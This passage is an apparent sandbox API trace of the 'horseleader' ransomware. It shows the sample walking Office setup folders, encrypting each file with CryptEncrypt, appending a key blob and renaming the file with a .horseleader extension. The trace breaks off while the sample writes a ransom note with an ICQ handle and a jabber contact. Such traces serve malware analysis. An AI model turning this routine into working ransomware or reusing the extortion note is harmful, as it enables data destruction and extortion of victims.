files\\microsoft shared\\office14\\office setup controller\\osetup.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0244.635] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\OSETUP.DLL") returned 94 [0244.635] StrStrW (lpFirst="OSETUP.DLL", lpSrch=".txt") returned 0x0 [0244.635] GetFileSizeEx (in: hFile=0x1a4, lpFileSize=0x32aeb58 | out: lpFileSize=0x32aeb58*=7379816) returned 1 [0244.635] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0244.635] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0244.638] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0244.639] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0244.639] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x3825b4, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0244.639] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0244.641] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0244.641] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0244.642] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x704b68, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0244.642] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0244.648] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0244.648] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0244.648] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0244.648] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aeb50*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aeb50*, lpNumberOfBytesWritten=0x32aeb7c*=0x4, lpOverlapped=0x0) returned 1 [0244.648] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aea98*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aea98*, lpNumberOfBytesWritten=0x32aeb7c*=0x80, lpOverlapped=0x0) returned 1 [0244.648] CloseHandle (hObject=0x1a4) returned 1 [0244.649] GetProcessHeap () returned 0x780000 [0244.649] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7e1110 [0244.649] wnsprintfW (in: pszDest=0x7e1110, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\OSETUP.DLL.horseleader") returned 106 [0244.649] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\OSETUP.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\osetup.dll"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\OSETUP.DLL.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\osetup.dll.horseleader")) returned 1 [0244.650] GetProcessHeap () returned 0x780000 [0244.650] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7e1110 | out: hHeap=0x780000) returned 1 [0244.650] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5de00200, ftCreationTime.dwHighDateTime=0x1cac9ac, ftLastAccessTime.dwLowDateTime=0x598fccf0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x5de00200, ftLastWriteTime.dwHighDateTime=0x1cac9ac, nFileSizeHigh=0x0, nFileSizeLow=0xb9a0, dwReserved0=0x49ce1216, dwReserved1=0x4f93752c, cFileName="OSetupPS.dll", cAlternateFileName="")) returned 1 [0244.651] lstrcmpiW (lpString1="OSetupPS.dll", lpString2="Windows") returned -1 [0244.651] wnsprintfW (in: pszDest=0x7db828, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\OSetupPS.dll") returned 96 [0244.651] StrStrIW (lpFirst="OSetupPS.dll", lpSrch=".horseleader") returned 0x0 [0244.651] lstrcmpW (lpString1="OSetupPS.dll", lpString2="#Decrypt#.txt") returned 1 [0244.651] lstrcmpW (lpString1="OSetupPS.dll", lpString2="_uninstalling_.png") returned 1 [0244.651] lstrlenW (lpString=".testttjffg") returned 11 [0244.651] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\OSetupPS.dll", lpSrch=".testttjffg") returned 0x0 [0244.651] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0244.651] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0244.651] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\OSetupPS.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\osetupps.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0244.652] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\OSetupPS.dll") returned 96 [0244.652] StrStrW (lpFirst="OSetupPS.dll", lpSrch=".txt") returned 0x0 [0244.652] GetFileSizeEx (in: hFile=0x1a4, lpFileSize=0x32aeb58 | out: lpFileSize=0x32aeb58*=47520) returned 1 [0244.652] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0244.655] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0244.656] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0244.657] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0244.657] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0244.657] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0244.658] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x19a0, lpOverlapped=0x0) returned 1 [0244.658] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xffffe660, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0244.658] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x19a0, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x19a0, lpOverlapped=0x0) returned 1 [0244.658] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0244.658] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aeb50*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aeb50*, lpNumberOfBytesWritten=0x32aeb7c*=0x4, lpOverlapped=0x0) returned 1 [0244.659] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aea98*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aea98*, lpNumberOfBytesWritten=0x32aeb7c*=0x80, lpOverlapped=0x0) returned 1 [0244.659] CloseHandle (hObject=0x1a4) returned 1 [0244.659] GetProcessHeap () returned 0x780000 [0244.659] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7e1110 [0244.659] wnsprintfW (in: pszDest=0x7e1110, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\OSetupPS.dll.horseleader") returned 108 [0244.660] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\OSetupPS.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\osetupps.dll"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\OSetupPS.dll.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\osetupps.dll.horseleader")) returned 1 [0244.661] GetProcessHeap () returned 0x780000 [0244.661] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7e1110 | out: hHeap=0x780000) returned 1 [0244.661] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x14af010, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x2095e10, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x2095e10, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x49ce1216, dwReserved1=0x4f93752c, cFileName="Outlook.en-us", cAlternateFileName="OUTLOO~1.EN-")) returned 1 [0244.661] lstrcmpiW (lpString1="Outlook.en-us", lpString2="Windows") returned -1 [0244.661] wnsprintfW (in: pszDest=0x7db828, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Outlook.en-us") returned 97 [0244.661] lstrcmpW (lpString1="Outlook.en-us", lpString2=".") returned 1 [0244.661] lstrcmpW (lpString1="Outlook.en-us", lpString2="..") returned 1 [0244.661] lstrcmpW (lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Outlook.en-us", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned -1 [0244.661] GetProcessHeap () returned 0x780000 [0244.661] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7e1110 [0244.661] wnsprintfW (in: pszDest=0x7e1110, cchDest=1024, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Outlook.en-us\\*") returned 99 [0244.661] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Outlook.en-us\\*", lpFindFileData=0x32ae928 | out: lpFindFileData=0x32ae928*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x14af010, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x2095e10, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x2095e10, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x989bbea3, dwReserved1=0xaacf483b, cFileName=".", cAlternateFileName="")) returned 0x7c68a0 [0244.662] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0244.662] wnsprintfW (in: pszDest=0x7e1110, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Outlook.en-us\\.") returned 99 [0244.662] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0244.663] FindNextFileW (in: hFindFile=0x7c68a0, lpFindFileData=0x32ae928 | out: lpFindFileData=0x32ae928*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x14af010, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x2095e10, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x2095e10, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x989bbea3, dwReserved1=0xaacf483b, cFileName="..", cAlternateFileName="")) returned 1 [0244.664] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0244.664] wnsprintfW (in: pszDest=0x7e1110, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Outlook.en-us\\..") returned 100 [0244.664] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0244.664] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0244.664] FindNextFileW (in: hFindFile=0x7c68a0, lpFindFileData=0x32ae928 | out: lpFindFileData=0x32ae928*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xee827f20, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0x14af010, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xee827f20, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0xc72, dwReserved0=0x989bbea3, dwReserved1=0xaacf483b, cFileName="OutlookMUI.XML", cAlternateFileName="OUTLOO~1.XML")) returned 1 [0244.665] lstrcmpiW (lpString1="OutlookMUI.XML", lpString2="Windows") returned -1 [0244.665] wnsprintfW (in: pszDest=0x7e1110, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Outlook.en-us\\OutlookMUI.XML") returned 112 [0244.665] StrStrIW (lpFirst="OutlookMUI.XML", lpSrch=".horseleader") returned 0x0 [0244.665] lstrcmpW (lpString1="OutlookMUI.XML", lpString2="#Decrypt#.txt") returned 1 [0244.665] lstrcmpW (lpString1="OutlookMUI.XML", lpString2="_uninstalling_.png") returned 1 [0244.665] lstrlenW (lpString=".testttjffg") returned 11 [0244.665] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Outlook.en-us\\OutlookMUI.XML", lpSrch=".testttjffg") returned 0x0 [0244.665] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32ae820 | out: pbBuffer=0x32ae820) returned 1 [0244.665] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32ae820*, pdwDataLen=0x32ae8dc*=0x24, dwBufLen=0x80 | out: pbData=0x32ae820*, pdwDataLen=0x32ae8dc*=0x80) returned 1 [0244.665] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Outlook.en-us\\OutlookMUI.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\outlook.en-us\\outlookmui.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x15c [0244.666] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Outlook.en-us\\OutlookMUI.XML") returned 112 [0244.666] StrStrW (lpFirst="OutlookMUI.XML", lpSrch=".txt") returned 0x0 [0244.666] GetFileSizeEx (in: hFile=0x15c, lpFileSize=0x32ae8e0 | out: lpFileSize=0x32ae8e0*=3186) returned 1 [0244.666] ReadFile (in: hFile=0x15c, lpBuffer=0x32a9820, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32ae904, lpOverlapped=0x0 | out: lpBuffer=0x32a9820*, lpNumberOfBytesRead=0x32ae904*=0xc72, lpOverlapped=0x0) returned 1 [0244.668] SetFilePointerEx (in: hFile=0x15c, liDistanceToMove=0xfffff38e, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0244.669] WriteFile (in: hFile=0x15c, lpBuffer=0x32a9820*, nNumberOfBytesToWrite=0xc72, lpNumberOfBytesWritten=0x32ae904, lpOverlapped=0x0 | out: lpBuffer=0x32a9820*, lpNumberOfBytesWritten=0x32ae904*=0xc72, lpOverlapped=0x0) returned 1 [0244.669] SetFilePointerEx (in: hFile=0x15c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0244.669] WriteFile (in: hFile=0x15c, lpBuffer=0x32ae8d8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32ae904, lpOverlapped=0x0 | out: lpBuffer=0x32ae8d8*, lpNumberOfBytesWritten=0x32ae904*=0x4, lpOverlapped=0x0) returned 1 [0244.669] WriteFile (in: hFile=0x15c, lpBuffer=0x32ae820*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32ae904, lpOverlapped=0x0 | out: lpBuffer=0x32ae820*, lpNumberOfBytesWritten=0x32ae904*=0x80, lpOverlapped=0x0) returned 1 [0244.669] CloseHandle (hObject=0x15c) returned 1 [0244.669] GetProcessHeap () returned 0x780000 [0244.669] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7e2960 [0244.670] wnsprintfW (in: pszDest=0x7e2960, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Outlook.en-us\\OutlookMUI.XML.horseleader") returned 124 [0244.671] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Outlook.en-us\\OutlookMUI.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\outlook.en-us\\outlookmui.xml"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Outlook.en-us\\OutlookMUI.XML.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\outlook.en-us\\outlookmui.xml.horseleader")) returned 1 [0244.672] GetProcessHeap () returned 0x780000 [0244.672] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7e2960 | out: hHeap=0x780000) returned 1 [0244.672] FindNextFileW (in: hFindFile=0x7c68a0, lpFindFileData=0x32ae928 | out: lpFindFileData=0x32ae928*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf00db300, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0x2095e10, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xf00db300, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x106f, dwReserved0=0x989bbea3, dwReserved1=0xaacf483b, cFileName="SETUP.XML", cAlternateFileName="")) returned 1 [0244.672] lstrcmpiW (lpString1="SETUP.XML", lpString2="Windows") returned -1 [0244.672] wnsprintfW (in: pszDest=0x7e1110, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Outlook.en-us\\SETUP.XML") returned 107 [0244.672] StrStrIW (lpFirst="SETUP.XML", lpSrch=".horseleader") returned 0x0 [0244.672] lstrcmpW (lpString1="SETUP.XML", lpString2="#Decrypt#.txt") returned 1 [0244.672] lstrcmpW (lpString1="SETUP.XML", lpString2="_uninstalling_.png") returned 1 [0244.672] lstrlenW (lpString=".testttjffg") returned 11 [0244.672] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Outlook.en-us\\SETUP.XML", lpSrch=".testttjffg") returned 0x0 [0244.672] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32ae820 | out: pbBuffer=0x32ae820) returned 1 [0244.673] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32ae820*, pdwDataLen=0x32ae8dc*=0x24, dwBufLen=0x80 | out: pbData=0x32ae820*, pdwDataLen=0x32ae8dc*=0x80) returned 1 [0244.673] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Outlook.en-us\\SETUP.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\outlook.en-us\\setup.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x15c [0244.674] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Outlook.en-us\\SETUP.XML") returned 107 [0244.674] StrStrW (lpFirst="SETUP.XML", lpSrch=".txt") returned 0x0 [0244.674] GetFileSizeEx (in: hFile=0x15c, lpFileSize=0x32ae8e0 | out: lpFileSize=0x32ae8e0*=4207) returned 1 [0244.675] ReadFile (in: hFile=0x15c, lpBuffer=0x32a9820, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32ae904, lpOverlapped=0x0 | out: lpBuffer=0x32a9820*, lpNumberOfBytesRead=0x32ae904*=0x106f, lpOverlapped=0x0) returned 1 [0244.677] SetFilePointerEx (in: hFile=0x15c, liDistanceToMove=0xffffef91, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0244.677] WriteFile (in: hFile=0x15c, lpBuffer=0x32a9820*, nNumberOfBytesToWrite=0x106f, lpNumberOfBytesWritten=0x32ae904, lpOverlapped=0x0 | out: lpBuffer=0x32a9820*, lpNumberOfBytesWritten=0x32ae904*=0x106f, lpOverlapped=0x0) returned 1 [0244.678] SetFilePointerEx (in: hFile=0x15c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0244.678] WriteFile (in: hFile=0x15c, lpBuffer=0x32ae8d8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32ae904, lpOverlapped=0x0 | out: lpBuffer=0x32ae8d8*, lpNumberOfBytesWritten=0x32ae904*=0x4, lpOverlapped=0x0) returned 1 [0244.678] WriteFile (in: hFile=0x15c, lpBuffer=0x32ae820*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32ae904, lpOverlapped=0x0 | out: lpBuffer=0x32ae820*, lpNumberOfBytesWritten=0x32ae904*=0x80, lpOverlapped=0x0) returned 1 [0244.678] CloseHandle (hObject=0x15c) returned 1 [0244.678] GetProcessHeap () returned 0x780000 [0244.678] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7e2960 [0244.678] wnsprintfW (in: pszDest=0x7e2960, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Outlook.en-us\\SETUP.XML.horseleader") returned 119 [0244.678] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Outlook.en-us\\SETUP.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\outlook.en-us\\setup.xml"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Outlook.en-us\\SETUP.XML.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\outlook.en-us\\setup.xml.horseleader")) returned 1 [0244.680] GetProcessHeap () returned 0x780000 [0244.680] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7e2960 | out: hHeap=0x780000) returned 1 [0244.680] FindNextFileW (in: hFindFile=0x7c68a0, lpFindFileData=0x32ae928 | out: lpFindFileData=0x32ae928*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf00db300, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0x2095e10, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xf00db300, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x106f, dwReserved0=0x989bbea3, dwReserved1=0xaacf483b, cFileName="SETUP.XML", cAlternateFileName="")) returned 0 [0244.680] FindClose (in: hFindFile=0x7c68a0 | out: hFindFile=0x7c68a0) returned 1 [0244.680] wnsprintfW (in: pszDest=0x7e1110, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Outlook.en-us\\#Decrypt#.txt") returned 111 [0244.680] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Outlook.en-us\\#Decrypt#.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\outlook.en-us\\#decrypt#.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0244.683] lstrlenA (lpString="All your files have been ENCRYPTED!!!\r\nWrite to our ICQ @Horseleader\r\nOr contact us via jabber - horseleader@xmpp.jp\r\nJabber client installation instructions:\r\nDownload the jabber (Pidgin) client from 